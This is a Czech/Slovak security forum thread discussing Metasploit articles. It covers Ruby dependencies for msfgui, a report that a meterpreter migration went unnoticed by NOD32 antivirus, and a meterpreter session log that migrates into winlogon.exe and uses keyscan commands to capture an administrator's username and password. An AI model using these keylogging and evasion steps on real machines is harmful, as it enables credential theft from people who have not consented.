Diskuze Metasploit Framework + Exploitace

Fórum Diskuze je určeno výhradně ke komentování článků a novinek publikovaných na security portálu airdump.cz. K založení a psaní příspěvků je potřeba registrace.
Odpovědět
Uživatelský avatar
backman
Level 7
Příspěvky: 304
Registrován: 30 čer 2008, 17:01
Bydliště: Praha [CZ]

30 črc 2008, 18:30

Diskuze Framework Metaspl0it + 3.5.2 Release
- Tutoriál Exploitace Windows XP
- Článek Metasploit meterpreter sniffing
- Release Metaspl0it Framework 3.4.0
- Release Metaspl0it Framework3.4.1.

Každý článek (text, tutoriál) z airdump.cz lze diskutovat v příslušné Diskuzi. Bez registrace (pokud o registraci nemáte zájem) může uživatel komentáře pouze číst. Všechny části Fóra vyžadují pro odeslání příspěvku ověřenou registraci. Registrovaný uživatel je upozorněn na odpověď e-mailem. Diskuze ve Fóru Komentáře je omezena na publikované texty na airdump.cz.
Ve Fóru používejte diakritiku a čtěte nápovědu než odešlete první post!

Uživatelský avatar
baracuda
Level 0
Příspěvky: 7
Registrován: 10 kvě 2008, 19:23

04 úno 2009, 16:23

Ahoj, četl jsem najmíň 5x o možnosti aktualizace Frameworku Metasploit, nikde ale nevidím menu pro update exploit databáze.. Metasploit řady 2 a 3 chci používat v Ubuntu a Debianu.. funguje to ale nějak divně..

Uživatelský avatar
cocaine
Level 7
Příspěvky: 398
Registrován: 29 dub 2008, 23:54
Bydliště: Země Oz

04 úno 2009, 17:14

Je potřeba instalovat balíčky ruby, ruby common, ruby-gtk2, ruby-libglade2 pro msfgui včetně ruby-pango, ruby-glib2, ruby-gdkpixbuf2, a ruby-atk.. Myslím, že označení libgtk2-ruby a libglade2 sebou nainstaluje automaticky všechny závislosti.. Update není potřeba stačí instalovat svn verzi..
Jednou deset minut a ušetříš hodiny

Uživatelský avatar
maskov1
Level 0
Příspěvky: 10
Registrován: 10 zář 2008, 13:30

08 kvě 2009, 14:39

Takze ku meterpreter migracii, skusal som migrovat na Unlocker Assistant, ktory som mal na desktopre nainstalovany uz v zaklade windoze (dark edition), po ukonceni session nebol problem so spominanym restartom PC.. rovnako ani nod32 AV si nicoho nevsimol, jedine po ukonceni session v Unlocker Assistante, hodilo popup ukonceni programu (klasicke odesilat, neodesilat) .. to vobec obet nebude povazovat ako utok na pocitas (podla mna).. IE 7 po ukonceni slo v pohode zavriet

PS: Miso, odskusane aj s NOD32 v4 ako si chcel, prienik v pohode aj migracia
Naposledy upravil(a) maskov1 dne 08 kvě 2009, 15:21, celkem upraveno 1 x.

Uživatelský avatar
Michal
Level 7
Příspěvky: 242
Registrován: 19 kvě 2008, 20:14
Bydliště: Košice

09 kvě 2009, 12:21

Čitateľom referencií z článku metasploit meterpreter sniffing určite neunikol novší post HDM o zachytení prihlasovacích údajov zo sniffovaného systému migráciou do procesu winlogon.exe. Pri migrácii do tohto procesu nedochádza k strate spojenia s testovaným počítačom po odhlásení užívateľa. Avšak meterpreter nezachytí žiadne iné stlačenie kláves okrem prihlasovacieho mena a hesla novo/opakovane prihláseného užívateľa. Nie je teda migrácia ako migrácia :)

Kód: Vybrat vše

1484  winlogon.exe       \??\C:\WINDOWS\system32\winlogon.exe
meterpreter > migrate 1484
[*] Migrating to 1484...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 1484
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump 
Dumping captured keystrokes...
Administrator <Tab> password <Return>
maskov1 ďakujem.

Odhlásenie z procesu winlogon.exe malo za následok reštart počítača, po ktorom následovalo popup okno s hlásením o chybe viz obrázok
Naposledy upravil(a) Michal dne 09 kvě 2009, 12:34, celkem upraveno 1 x.

Uživatelský avatar
kmk
Příspěvky: 1
Registrován: 22 bře 2009, 04:37

19 črc 2010, 22:49

Můžete opravit v posledním článku slovo niní, 3x stejná chyba a dokonce i v nadpisu, to už trochu bije do očí. Díky

Uživatelský avatar
android
Level 7
Příspěvky: 461
Registrován: 10 říj 2008, 22:48

19 črc 2010, 22:52

4x.. díky za echo.. opraveno

Odpovědět
  • Informace
  • Kdo je online

    Uživatelé prohlížející si toto fórum: Žádní registrovaní uživatelé a 2 hosti